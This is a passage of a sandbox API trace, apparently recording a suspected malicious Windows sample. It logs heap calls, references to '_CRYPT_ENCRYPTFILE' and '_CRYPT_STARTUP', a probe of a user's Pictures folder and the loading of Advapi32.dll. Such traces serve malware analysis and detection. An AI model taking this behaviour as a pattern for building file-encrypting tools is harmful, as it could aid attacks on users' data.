dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0091.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0091.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0091.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0091.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0091.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0091.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0091.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0091.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0091.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0091.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0091.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0091.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0091.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0091.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0091.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0091.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.532] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0091.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0091.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0091.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0091.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0091.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0091.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0091.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0091.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0091.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0091.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0091.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0091.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0091.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0091.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0091.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0091.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0091.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0091.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0091.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0091.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0091.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0091.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0091.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0091.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0091.533] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0091.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0091.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0091.534] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0091.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0091.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0091.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0091.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0091.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0091.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0091.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0091.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0091.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0091.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2490 [0091.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0091.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0091.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0091.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0091.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0091.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0091.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0091.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431de60 [0091.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0091.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0091.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0091.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24b0 [0091.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0091.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0091.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0091.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0091.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0091.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0091.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0091.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0d0 [0091.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0091.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0091.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0091.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0091.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0091.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0091.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0091.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0091.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0091.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0091.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0091.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0091.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0091.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0091.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0091.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0091.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0091.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0091.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0091.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0091.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0091.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0091.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0091.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0091.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0091.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0091.537] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0091.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0091.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0091.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0091.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0091.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0091.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0091.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0091.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0091.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0091.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0091.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0091.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0091.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0091.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0091.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0091.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0091.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0091.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0091.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0091.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0091.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0091.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0091.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0091.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0091.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0091.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0091.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0091.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0091.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0091.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0091.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0091.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0091.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0091.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0091.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0091.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0091.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0091.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0091.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0091.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0091.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0091.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0091.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0091.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0091.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0091.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0091.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0091.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0091.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0091.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0091.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0091.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0091.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0091.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0091.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0091.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.540] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\desktop.ini", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac600 [0091.541] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0091.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0091.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0091.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0091.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0091.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0091.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0091.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0091.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0091.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0091.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0091.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0091.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0091.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0091.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0091.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0091.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0091.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0091.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0091.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0091.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0091.542] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0091.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0091.542] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0091.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0091.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0091.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0091.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0091.542] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0091.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0091.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0091.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0091.542] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0091.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0091.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0091.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca460 [0091.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0091.543] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0091.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0091.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0091.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0091.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0091.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0091.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0091.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0091.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0091.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0091.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0091.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0091.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0091.543] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0091.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0091.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0091.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0091.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0091.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0091.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0091.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0091.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0091.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0091.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0091.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0091.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0091.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0091.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0091.544] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0091.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0091.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0091.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0091.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0091.545] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, 